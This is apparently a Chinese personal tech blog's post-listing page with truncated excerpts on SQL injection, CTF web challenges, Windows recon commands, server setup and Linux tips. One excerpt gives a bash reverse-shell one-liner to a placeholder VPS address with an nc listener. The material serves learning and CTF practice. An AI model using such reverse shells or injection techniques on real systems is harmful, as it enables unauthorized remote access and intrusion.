sql报错注入

十种MySQL报错注入 https://www.cnblogs.com/wocalieshenmegui/p/5917967.html 给了floor公式 https://blog.csdn.net/liangdongjuan/article/details/78406395 给了floor更...

2018-09-20 18:32:12

阅读数 82

评论数 0

安全

关于00截断原理的一些思考:https://blog.csdn.net/zpy1998zpy/article/details/80545408#comments 什么是sql注入?sql注入简介https://resources.infosecinstitute.com/sql-injectio...

2018-09-20 15:51:03

阅读数 100

评论数 0

ctf实验吧

后台登陆 格式:flag:{xxx} 解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 注释里有源码,绕过就行 <!-- $password=$_POST['password']; $sql = &...

2018-09-18 14:45:32

阅读数 537

评论数 0

php 安全

https://blog.csdn.net/qq_31481187/article/details/60968595#comments https://blog.csdn.net/Ruhe_king/article/details/82692172

2018-09-16 23:21:30

阅读数 31

评论数 0

ctf sql注入关键词绕过

https://blog.csdn.net/wy_97/article/details/78085664 https://blog.csdn.net/zacklin/article/details/7741455 https://www.cnblogs.com/REscan/p/7043705...

2018-09-13 18:11:30

阅读数 217

评论数 0

PHP代码安全【PHP弱口令、加密函数、绕过函数】/CTF代码审计题

注:结合现在所学,把以前的一些很散的博客给汇总起来方便利用【删了黑历史,哈哈哈】 1、判等类型 1.1、”==”与”===”比较漏洞/switch 如果你认为“==”和"==="最大的区别在于,“==”是判断数值是否相等,“===”则是判断数值和类型是否相...

2018-09-13 17:54:26

阅读数 185

评论数 0

bugku web(1)

md5 collision(NUPT_CTF) 100 http://120.24.86.145:9009/md5.php   md5碰撞 漏洞描述 <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = ...

2018-09-11 19:37:49

阅读数 122

评论数 0

bugku web篇

速度要快 100 速度要快!!!!!! http://120.24.86.145:8002/web6/ 格式KEY{xxxxxxxxxxxxxx} 查看源代码: </br>我感觉你得快点!!!<!-- OK ,now ...

2018-09-08 19:16:37

阅读数 331

评论数 0

windows一些常用的cmd命令

net user 列出计算机上的用户帐户 net localgroup 查看当前系统中所有的用户组 net localgroup 用户组名 查看组中的用户 net user 用户名 查看用户的详细信息 echo %username% 查看当前用户信息 whoami 查看当前用户信息 n...

2019-05-24 21:16:48

阅读数 38

评论数 0

GitHub上README.md排版样式教程

最近对它的README.md文件颇为感兴趣。便写下这贴,帮助更多的还不会编写README文件的同学们。 README文件后缀名为md。md是markdown的缩写,markdown是一种编辑博客的语言。用惯了可视化的博客编辑器(比如CSDN博客,囧),这种编程式的博客编辑方案着实让人眼前一亮。不...

2019-05-17 20:45:48

阅读数 68

评论数 0

linux反弹shell到自己的vps上

使用bash 首先在vps的安全组规则中增加一个端口9999,方便我们一会监听9999端口. 远程连接到vps,执行以下命令: nc -vlp 9999 然后在本地计算机上运行bash -i >& /dev/tcp/[your vps]/9999 0&...

2019-04-17 21:18:07

阅读数 25

评论数 0

我是如何成功访问自己的公网ip

真的瞎写,仅仅记录一下第一次访问自己的公网ip的经历 1、首先在阿里云买了个ecs 2、然后创建了个实例 3、这时就有了一个公网ip,尝试ping了一下,ping通。直接尝试访问http://[公网ip]访问不了,真的是没有一点建站知识,完全不知道要怎么办。 4、依次点击实例最右侧...

2019-04-17 20:32:24

阅读数 68

评论数 0

阿里云服务器ECS LAMP环境安装(Ubuntu)

很有帮助的一篇文章,这里转载记录一下。 所周知如果要搭建一个网站lamp环境必不可少,但是阿里云初始的时候没有自带lamp环境,原本阿里云自带的包也已经失效了,所以需要自己来安装。但是网上大部分博客都有些老,于是中间遇到了一些小坑,今天就在这里记录下来方便大家。 在所有的开始,先升级apt...

2019-04-17 19:57:48

阅读数 38

评论数 0

一文看懂web服务器、应用服务器、web容器、反向代理服务器区别与联系

作者写的太好了,保留记录一下https://www.cnblogs.com/vipyoumay/archive/2017/08/31/7455431.html 我们知道,不同肤色的人外貌差别很大,而双胞胎的辨识很难。有意思的是Web服务器/Web容器/Web应用程序服务器/反向代理有点像四胞胎...

2019-03-02 22:43:30

阅读数 30

评论数 0

ssr+polipo实现终端代理

本机是debian,这个配置过程应该适用于所有Linux系统。使用fedora只需将apt-get 命令换成yum。 首先我们要有shadowsocks还有帐号: 下载安装shadowsocks.自行百度或者google之 购买代理帐号(我用的是师哥的帐号),很多地方可以买,挺便宜的。例如这...

2019-03-01 22:03:24

阅读数 431

评论数 0

nohup和&的区别

在第一家公司工作的时候, 我认识了&,在第二家公司工作的时候, 我认识了nohup,  这就是渊源。  随后, 我就一直糊涂用他们, 但并不懂这两个东西。 网上很多地方是乱扯, 瞎复制, 为什么不自己实践一下呢?          看个小程序: #include &...

2019-02-02 19:16:43

阅读数 81

评论数 0

linux下运行jar

Linux 运行jar包命令如下: 方式一: java -jar XXX.jar 特点:当前ssh窗口被锁定,可按CTRL + C打断程序运行,或直接关闭窗口,程序退出 那如何让窗口不锁定? 方式二: java -jar XXX.jar & &am...

2019-02-02 18:58:56

阅读数 40

评论数 0

linux添加环境变量

查看PATH环境变量的设置,当前命令是否存在于PATH环境变量中     #查看PATH:     echo $PATH     举例说,命令 hello 在/c     但执行的时候提示:     -bash: composr: command not found     这个时候,通...

2019-02-01 05:27:03

阅读数 27

评论数 0

linux下运行js文件

linux下运行js文件: 1、首先创建一个js文件:     vi test.js 在里面写     console.log(‘Hello World!’); 然后     wq! 保存并强制退出 2、运行     node test.js 命令,就会看到     Hello...

2019-02-01 02:21:45

阅读数 816

评论数 0

把ip地址转换为十进制数字

原ip:219.239.110.138 把这四个数字分别转换为十六进制: db ef 6e 8a 把dbef6e8a转换为十进制 3689901706   原ip 192.168.158.1 转换为十六进制: c0 a8 9e 01    注意这里是01。规则所限,ip的每一段必须转为两...

2019-01-05 15:27:04

阅读数 646

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭